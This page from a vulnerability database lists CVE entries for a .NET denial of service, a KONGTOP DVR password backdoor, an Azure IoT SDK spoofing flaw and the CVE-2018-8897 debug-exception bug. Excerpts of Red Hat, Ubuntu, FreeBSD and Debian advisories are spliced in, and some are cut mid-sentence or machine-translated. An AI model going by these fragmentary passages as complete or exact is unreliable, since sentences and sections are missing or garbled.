VARIoT IoT vulnerabilities database
| VAR-201805-0649 | CVE-2018-0765 | Microsoft .NET Framework and .NET Core Service disruption in (DoS) Vulnerabilities |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A denial of service vulnerability exists when .NET and .NET Core improperly process XML documents, aka ".NET and .NET Core Denial of Service Vulnerability." This affects Microsoft .NET Framework 2.0, Microsoft .NET Framework 3.0, Microsoft .NET Framework 4.7.1, Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1, Microsoft .NET Framework 4.5.2, Microsoft .NET Framework 4.7/4.7.1, Microsoft .NET Framework 4.6, Microsoft .NET Framework 3.5, Microsoft .NET Framework 3.5.1, Microsoft .NET Framework 4.6/4.6.1/4.6.2, Microsoft .NET Framework 4.6.2/4.7/4.7.1, .NET Core 2.0, Microsoft .NET Framework 4.7.2.
Successful exploits will attackers to cause a denial of service condition
| VAR-201805-0696 | CVE-2018-10734 | KONGTOP DVR Information disclosure vulnerability in devices |
CVSS V2: 5.0 CVSS V3: 9.8 Severity: CRITICAL |
KONGTOP DVR devices A303, A403, D303, D305, and D403 contain a backdoor that prints the login password via a Print_Password function call in certain circumstances. KONGTOP DVR The device contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. KONGTOP DVR A303 and so on are all different types of network DVR equipment from China's KONGTOP Industrial Company.
A security vulnerability exists in several KONGTOP DVR products due to a backdoor in the Telnetd file. An attacker could exploit the vulnerability with a call to the 'Print_Password' function to obtain information. The following products are affected: KONGTOP DVR A303; KONGTOP DVR A403; KONGTOP DVR D303; KONGTOP DVR D305; KONGTOP DVR D403
| VAR-201805-1058 | CVE-2018-8119 | plural Azure IoT SDK Impersonation vulnerability in products |
CVSS V2: 6.8 CVSS V3: 5.6 Severity: MEDIUM |
A spoofing vulnerability exists when the Azure IoT Device Provisioning AMQP Transport library improperly validates certificates over the AMQP protocol, aka "Azure IoT SDK Spoofing Vulnerability." This affects C# SDK, C SDK, Java SDK. Microsoft C #, C, and Java SDK for Azure IoT are software development kits for Microsoft Azure (Microsoft) based on C #, C, and Java languages for developing Azure IoT (Internet of Things Platform) applications, respectively. An attacker could use this vulnerability to impersonate a server. Multiple Microsoft Azure IoT SDKs are prone to a security vulnerability that may allow attackers to conduct spoofing attacks.
A man-in-the-middle attacker can exploit this issue to conduct spoofing attacks and perform unauthorized actions; other attacks are also possible
| VAR-201805-0950 | CVE-2018-8897 | Hardware debug exception documentation may result in unexpected behavior |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A statement in the System Programming Guide of the Intel 64 and IA-32 Architectures Software Developer's Manual (SDM) was mishandled in the development of some or all operating-system kernels, resulting in unexpected behavior for #DB exceptions that are deferred by MOV SS or POP SS, as demonstrated by (for example) privilege escalation in Windows, macOS, some Xen configurations, or FreeBSD, or a Linux kernel crash. The MOV to SS and POP SS instructions inhibit interrupts (including NMIs), data breakpoints, and single step trap exceptions until the instruction boundary following the next instruction (SDM Vol. 3A; section 6.8.3). (The inhibited data breakpoints are those on memory accessed by the MOV to SS or POP to SS instruction itself.) Note that debug exceptions are not inhibited by the interrupt enable (EFLAGS.IF) system flag (SDM Vol. 3A; section 2.3). If the instruction following the MOV to SS or POP to SS instruction is an instruction like SYSCALL, SYSENTER, INT 3, etc. that transfers control to the operating system at CPL < 3, the debug exception is delivered after the transfer to CPL < 3 is complete. OS kernels may not expect this order of events and may therefore experience unexpected behavior when it occurs. Some operating systems and hypervisors Intel There is a problem that does not expect a debug exception in the hardware architecture, or does not handle it properly. Inappropriate checking or handling for exceptional situations (CWE-703) - CVE-2018-8897 Intel Software Developer Manual (SDM) Vol. SDM Vol 3A section 2.3 According to the debug exception EFLAGS Register IF flag (Interrupt Enable Flag) Is not prohibited. So in certain situations, certain Intel x86-64 Ring level after using architecture-specific instructions 3 Running on OS From component , Higher ring level ( many OS In the ring level 0) Debug exceptions pointing to the data in are enabled. This allows the attacker to API May be used to access sensitive memory information or manipulate high privileged operating system functions.An authenticated attacker could obtain sensitive data in memory and manipulate higher privileged operating system functions. Microsoft Windows is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code with elevated privileges. 7.2) - noarch, x86_64
3. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2018:1319-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2018:1319
Issue date: 2018-05-08
CVE Names: CVE-2017-7645 CVE-2017-8824 CVE-2017-13166
CVE-2017-18017 CVE-2017-1000410 CVE-2018-8897
=====================================================================
1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 6.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - noarch, x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, noarch, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
Security Fix(es):
* hw: cpu: speculative execution permission faults handling (CVE-2017-5754)
* Kernel: error in exception handling leads to DoS (CVE-2018-8897)
* kernel: nfsd: Incorrect handling of long RPC replies (CVE-2017-7645)
* kernel: Use-after-free vulnerability in DCCP socket (CVE-2017-8824)
* kernel: v4l2: disabled memory access protection mechanism allowing
privilege escalation (CVE-2017-13166)
* kernel: netfilter: use-after-free in tcpmss_mangle_packet function in
net/netfilter/xt_TCPMSS.c (CVE-2017-18017)
* kernel: Stack information leak in the EFS element (CVE-2017-1000410)
For more details about the security issue(s), including the impact, a CVSS
score, and other related information, refer to the CVE page(s) listed in
the References section.
Red Hat would like to thank Google Project Zero for reporting
CVE-2017-5754; Nick Peterson (Everdox Tech LLC) and Andy Lutomirski for
reporting CVE-2018-8897; Mohamed Ghannam for reporting CVE-2017-8824; and
Armis Labs for reporting CVE-2017-1000410.
Bug Fix(es):
These updated kernel packages include also numerous bug fixes. Space
precludes documenting all of these bug fixes in this advisory. See the bug
fix descriptions in the related Knowledge Article:
https://access.redhat.com/articles/3431591
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1443615 - CVE-2017-7645 kernel: nfsd: Incorrect handling of long RPC replies
1519160 - CVE-2017-1000410 kernel: Stack information leak in the EFS element
1519591 - CVE-2017-8824 kernel: Use-after-free vulnerability in DCCP socket
1519781 - CVE-2017-5754 hw: cpu: speculative execution permission faults handling
1531135 - CVE-2017-18017 kernel: netfilter: use-after-free in tcpmss_mangle_packet function in net/netfilter/xt_TCPMSS.c
1548412 - CVE-2017-13166 kernel: v4l2: disabled memory access protection mechanism allowing privilege escalation
1567074 - CVE-2018-8897 Kernel: error in exception handling leads to DoS
6. Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source:
kernel-2.6.32-696.28.1.el6.src.rpm
i386:
kernel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-headers-2.6.32-696.28.1.el6.i686.rpm
perf-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
noarch:
kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm
kernel-doc-2.6.32-696.28.1.el6.noarch.rpm
kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm
perf-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source:
kernel-2.6.32-696.28.1.el6.src.rpm
noarch:
kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm
kernel-doc-2.6.32-696.28.1.el6.noarch.rpm
kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm
perf-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source:
kernel-2.6.32-696.28.1.el6.src.rpm
i386:
kernel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-headers-2.6.32-696.28.1.el6.i686.rpm
perf-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
noarch:
kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm
kernel-doc-2.6.32-696.28.1.el6.noarch.rpm
kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm
ppc64:
kernel-2.6.32-696.28.1.el6.ppc64.rpm
kernel-bootwrapper-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debug-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm
kernel-devel-2.6.32-696.28.1.el6.ppc64.rpm
kernel-headers-2.6.32-696.28.1.el6.ppc64.rpm
perf-2.6.32-696.28.1.el6.ppc64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
s390x:
kernel-2.6.32-696.28.1.el6.s390x.rpm
kernel-debug-2.6.32-696.28.1.el6.s390x.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.s390x.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm
kernel-devel-2.6.32-696.28.1.el6.s390x.rpm
kernel-headers-2.6.32-696.28.1.el6.s390x.rpm
kernel-kdump-2.6.32-696.28.1.el6.s390x.rpm
kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
kernel-kdump-devel-2.6.32-696.28.1.el6.s390x.rpm
perf-2.6.32-696.28.1.el6.s390x.rpm
perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
x86_64:
kernel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm
perf-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
ppc64:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
kernel-debuginfo-common-ppc64-2.6.32-696.28.1.el6.ppc64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
python-perf-2.6.32-696.28.1.el6.ppc64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.ppc64.rpm
s390x:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
kernel-debuginfo-common-s390x-2.6.32-696.28.1.el6.s390x.rpm
kernel-kdump-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
python-perf-2.6.32-696.28.1.el6.s390x.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.s390x.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source:
kernel-2.6.32-696.28.1.el6.src.rpm
i386:
kernel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-headers-2.6.32-696.28.1.el6.i686.rpm
perf-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
noarch:
kernel-abi-whitelists-2.6.32-696.28.1.el6.noarch.rpm
kernel-doc-2.6.32-696.28.1.el6.noarch.rpm
kernel-firmware-2.6.32-696.28.1.el6.noarch.rpm
x86_64:
kernel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.i686.rpm
kernel-debug-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
kernel-devel-2.6.32-696.28.1.el6.x86_64.rpm
kernel-headers-2.6.32-696.28.1.el6.x86_64.rpm
perf-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.i686.rpm
kernel-debuginfo-common-i686-2.6.32-696.28.1.el6.i686.rpm
perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
python-perf-2.6.32-696.28.1.el6.i686.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.i686.rpm
x86_64:
kernel-debug-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
kernel-debuginfo-common-x86_64-2.6.32-696.28.1.el6.x86_64.rpm
perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-2.6.32-696.28.1.el6.x86_64.rpm
python-perf-debuginfo-2.6.32-696.28.1.el6.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-7645
https://access.redhat.com/security/cve/CVE-2017-8824
https://access.redhat.com/security/cve/CVE-2017-13166
https://access.redhat.com/security/cve/CVE-2017-18017
https://access.redhat.com/security/cve/CVE-2017-1000410
https://access.redhat.com/security/cve/CVE-2018-8897
https://access.redhat.com/security/updates/classification/#important
https://access.redhat.com/articles/3431591
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2018 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFa8fO8XlSAg2UNWIIRAnN0AKCBdjdw1bC12xju0GwoOedA1L8osACaA1Ze
4IKrbiFeHd+C9bqCjUFX4pw=
=3psi
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
. 6.4) - x86_64
3.
Bug Fix(es):
* The kernel build requirements have been updated to the GNU Compiler
Collection (GCC) compiler version that has the support for Retpolines. The
Retpolines mechanism is a software construct that leverages specific
knowledge of the underlying hardware to mitigate the branch target
injection, also known as Spectre variant 2 vulnerability described in
CVE-2017-5715. (BZ#1554251)
4. Intel Architecture (processor architecture) is a CPU specification developed by Intel Corporation for its processor. There are security vulnerabilities in the operating systems of multiple vendors. Systems from the following vendors are affected: Apple; DragonFly BSD Project; FreeBSD Project; Linux Kernel; Microsoft; Red Hat; SUSE Linux; Ubuntu; Vmware; Xen.
CVE-2018-10471
An error was discovered in the mitigations against Meltdown which
could result in denial of service.
CVE-2018-10472
Anthony Perard discovered that incorrect parsing of CDROM images
can result in information disclosure.
CVE-2018-10981
Jan Beulich discovered that malformed device models could result
in denial of service.
CVE-2018-10982
Roger Pau Monne discovered that incorrect handling of high precision
event timers could result in denial of service and potentially
privilege escalation. ==========================================================================
Ubuntu Security Notice USN-3641-2
May 08, 2018
linux, linux-lts-trusty vulnerabilities
==========================================================================
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 12.04 ESM
Summary:
Several security issues were fixed in the Linux kernel. This update provides the
corresponding updates for Ubuntu 12.04 ESM. A local attacker
could use this to cause a denial of service (system crash). This issue only
affected the amd64 architecture. A local attacker in a KVM virtual machine could use this to
cause a denial of service (guest VM crash) or possibly escalate privileges
inside of the virtual machine. This issue only affected the i386 and amd64
architectures. (CVE-2018-1087)
Andy Lutomirski discovered that the Linux kernel did not properly perform
error handling on virtualized debug registers. (CVE-2018-1000199)
Update instructions:
The problem can be corrected by updating your system to the following
package versions:
Ubuntu 12.04 ESM:
linux-image-3.13.0-147-generic 3.13.0-147.196~precise1
linux-image-3.13.0-147-generic-lpae 3.13.0-147.196~precise1
linux-image-3.2.0-134-generic 3.2.0-134.180
linux-image-3.2.0-134-generic-pae 3.2.0-134.180
linux-image-3.2.0-134-highbank 3.2.0-134.180
linux-image-3.2.0-134-omap 3.2.0-134.180
linux-image-3.2.0-134-powerpc-smp 3.2.0-134.180
linux-image-3.2.0-134-powerpc64-smp 3.2.0-134.180
linux-image-3.2.0-134-virtual 3.2.0-134.180
linux-image-generic 3.2.0.134.149
linux-image-generic-lpae-lts-trusty 3.13.0.147.138
linux-image-generic-lts-trusty 3.13.0.147.138
linux-image-generic-pae 3.2.0.134.149
linux-image-highbank 3.2.0.134.149
linux-image-omap 3.2.0.134.149
linux-image-powerpc 3.2.0.134.149
linux-image-powerpc-smp 3.2.0.134.149
linux-image-powerpc64-smp 3.2.0.134.149
After a standard system update you need to reboot your computer to make
all the necessary changes.
ATTENTION: Due to an unavoidable ABI change the kernel updates have
been given a new version number, which requires you to recompile and
reinstall all third party kernel modules you might have installed.
Unless you manually uninstalled the standard kernel metapackages
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,
linux-powerpc), a standard system upgrade will automatically perform
this as well. These packages include redhat-release-virtualization-host,
ovirt-node, and rhev-hypervisor. RHVH features a Cockpit user
interface for monitoring the host's resources and performing administrative
tasks.
Includes GlusterFS fixes for CVE-2018-1088, dhcp fixes for CVE-2018-1111,
kernel fixes for CVE-2018-1087, and kernel fixes for CVE-2018-8897.
A list of bugs fixed in this update is available in the Technical Notes
book:
https://access.redhat.com/documentation/en-us/red_hat_virtualization/4.2/ht
ml/technical_notes/
4. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1357247 - rhvh 4: reboot after install shows "4m[terminated]" and takes long to reboot
1374007 - [RFE] RHV-H does not default to LVM Thin Provisioning
1420068 - [RFE] RHV-H should meet NIST 800-53 partitioning requirements by default
1422676 - [Test Only] Test Ansible playbook for registration
1429485 - [RFE] Imgbased layers should be named with '%{name}-%{version}-%{release}' instead of %{name}-%{version}
1433394 - kdump could fill up /var filesystem while writing to /var/crash
1443965 - Libvirt is disabled on RHVH host
1454536 - HostedEngine setup fails if RHV-H timezone < UTC set during installation
1474268 - RHVH host displays "upgrade available" information on the engine after registering until an update is released
1489567 - Host Software tab does not show exact RHVH version anymore
1501161 - The version displays as "4.1" for subscribed product with RHVH 4.2
1502920 - File missing after upgrade of RHVH node from version RHVH-4.1-20170925.0 to latest.
1503148 - [RFE] translate between basic ntp configurations and chrony configurations
1516123 - tuned-adm timeout while adding the host in manager and the deployment will fail/take time to complete
1534855 - RHVH brand is missing on cockpit login screen. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
=============================================================================
FreeBSD-SA-18:06.debugreg Security Advisory
The FreeBSD Project
Topic: Mishandling of x86 debug exceptions
Category: core
Module: kernel
Announced: 2018-05-08
Credits: Nick Peterson, Everdox Tech LLC
https://www.linkedin.com/in/everdox
Andy Lutomirski
Affects: All supported versions of FreeBSD.
Corrected: 2018-05-08 17:03:33 UTC (stable/11, 11.2-PRERELEASE)
2018-05-08 17:12:10 UTC (releng/11.1, 11.1-RELEASE-p10)
2018-05-08 17:05:39 UTC (stable/10, 10.4-STABLE)
2018-05-08 17:12:10 UTC (releng/10.4, 10.4-RELEASE-p9)
CVE Name: CVE-2018-8897
For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <URL:https://security.FreeBSD.org/>. Background
On x86 architecture systems, the stack is represented by the combination of
a stack segment and a stack pointer, which must remain in sync for proper
operation. Instructions related to manipulating the stack segment have
special handling to facilitate consistency with changes to the stack pointer.
II. If that instruction is
a system call or similar instruction that transfers control to the operating
system, the debug exception will be handled in the kernel context instead of
the user context.
III.
IV. Workaround
No workaround is available.
V. Solution
Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
using either a binary or source code patch, and then reboot.
1) To update your vulnerable system via a binary patch:
Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:
# freebsd-update fetch
# freebsd-update install
And reboot.
2) To update your vulnerable system via a source code patch:
The following patches have been verified to apply to the applicable
FreeBSD release branches.
a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.
[FreeBSD 11.1]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.11.1.patch.asc
# gpg --verify debugreg.11.1.patch.asc
[FreeBSD 10.4]
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch
# fetch https://security.FreeBSD.org/patches/SA-18:06/debugreg.10.4.patch.asc
# gpg --verify debugreg.10.4.patch.asc
b) Apply the patch. Execute the following commands as root:
# cd /usr/src
# patch < /path/to/patch
c) Recompile and install your kernel as described in
<URL:https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.
VI. Correction details
The following list contains the correction revision numbers for each
affected branch.
Branch/path Revision
- -------------------------------------------------------------------------
stable/10/ r333370
releng/10.4/ r333371
stable/11/ r333369
releng/11.1/ r333371
- -------------------------------------------------------------------------
To see which files were modified by a particular revision, run the
following command, replacing NNNNNN with the revision number, on a
machine with Subversion installed:
# svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base
Or visit the following URL, replacing NNNNNN with the revision number:
<URL:https://svnweb.freebsd.org/base?view=revision&revision=NNNNNN>
VII.
CVE-2018-1087
Andy Lutomirski discovered that the KVM implementation did not
properly handle #DB exceptions while deferred by MOV SS/POP SS,
allowing an unprivileged KVM guest user to crash the guest or
potentially escalate their privileges.
For the oldstable distribution (jessie), these problems have been fixed
in version 3.16.56-1+deb8u1. This update includes various fixes for
regressions from 3.16.56-1 as released in DSA-4187-1 (Cf.
For the stable distribution (stretch), these problems have been fixed in
version 4.9.88-1+deb9u1. The fix for CVE-2018-1108 applied in DSA-4188-1
is temporarily reverted due to various regression, cf.
